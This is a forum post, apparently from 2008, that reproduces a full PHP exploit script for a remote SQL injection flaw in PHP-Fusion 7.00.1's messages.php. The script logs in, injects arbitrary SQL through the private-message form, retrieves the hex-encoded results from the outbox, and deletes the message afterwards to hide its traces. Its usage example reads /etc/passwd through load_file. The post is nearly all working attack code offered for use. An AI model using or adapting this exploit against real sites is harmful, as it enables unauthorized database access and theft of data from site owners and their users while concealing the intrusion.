Guest vini4p Posted November 21, 2008 Report Posted November 21, 2008 <?php/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit requires magic_quotes == off coded by irk4z[at]yahoo.pl homepage: http://irk4z.wordpress.com greets: all friends *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/$host = $argv[1];$path = $argv[2];$login = $argv[3];$pass = $argv[4];$sql_injection = $argv[5];echo"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n"." PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n"." requires magic_quotes == off\n"."\n"." coded by irk4z[at]yahoo.pl\n"." homepage: http://irk4z.wordpress.com\n"."\n"." greets: all friends \n"."*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){ echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" . " php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n". " php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n"; die;}echo "Logging into system...";//login to php-fusion using login and pass$login_data = send($host, array( "path" => $path."news.php", "post" => array( "user_name" => $login, "user_pass" => $pass, "login" => "Login" ) ) );//get cookiespreg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);$cookies = implode(' ', $matches[1]);//get user idpreg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);$my_id = $matches[1][0];if(empty($my_id)){ echo "\n[x] Incorrect login or password.."; die;} else { echo "[ok]\n";}$id_message = uniqid();$inhex = '';for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;echo "Running sql-injection...\n";//running sql-injection$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&", "cookie" => $cookies, "post" => array( "send_message" => 'X', "subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*", "message" => "XXX" ) ) );echo "Getting data...\n\n";$res = send($host, array( "path" => $path."messages.php?folder=outbox", "cookie" => $cookies ) );preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);$id_message_number = $matches[1][0];$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number, "cookie" => $cookies ) );preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);if( empty($matches[1][0]) ){ echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";} else { $tmp = ''; $hex = $matches[1][0]; //unhex it! for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1])); echo "DATA: \n".$tmp."\n\n";}echo "Deleting message...\n";$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number, "cookie" => $cookies, "post" => array ( "delete" => "Delete" ) ) );//send http packetfunction send($host, $dane = "") { $packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n"; $packet .= "Host: {$host}\r\n"; if( !empty($dane['cookie']) ){ $packet .= "Cookie: {$dane['cookie']}\r\n"; } if( !empty($dane['post']) ){ $reszta_syfu = ""; foreach($dane['post'] as $tmp => $tmp2){ $reszta_syfu .= $tmp . "=" . $tmp2 . "&"; } $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n"; $packet .= $reszta_syfu; } else { $packet .= "Connection: Close\r\n\r\n"; } $o = @fsockopen($host, 80); if(!$o){ echo "\n[x] No response...\n"; die; } fputs($o, $packet); while (!feof($o)) $ret .= fread($o, 1024); fclose($o); return ($ret);}?> Quote
